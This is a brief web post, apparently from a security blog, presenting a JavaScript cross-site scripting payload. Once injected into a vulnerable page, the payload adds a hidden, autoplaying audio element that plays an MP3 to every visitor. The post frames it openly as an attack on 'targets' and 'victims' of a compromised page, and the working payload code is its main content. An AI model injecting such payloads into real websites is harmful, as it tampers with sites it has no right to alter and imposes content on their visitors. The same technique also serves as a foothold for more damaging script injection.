Play Music HTML5 Audio XSS Payload

Play Music HTML5 Audio XSS Payload

Script below allows you to share your favorite mp3 through your targets browser.

Lets assume the XSS payload was injected in to a web page that supports unrestricted HTML an mp3 audio file would then play to the visitors of the compromised web page.

[php]if(document.getElementById(‘xss_audio’) == null ) {
var a = document.createElement(‘audio’);
a.src = "http://127.0.0.1/music/LesRatsQuittentLeNavire.mp3"
a.autoplay=true;
a.id=’xss_audio’;
a.style.display=’none’;
document.body.appendChild(a);
}[/php]

A simple script that uses html5 audio tag to share your favorite MP3 with the victim.

Author : Renaud Bidou
 Injecting XSS Payloads into an image
Spread the love

Subscribe to our newsletter!

yoast seo premium free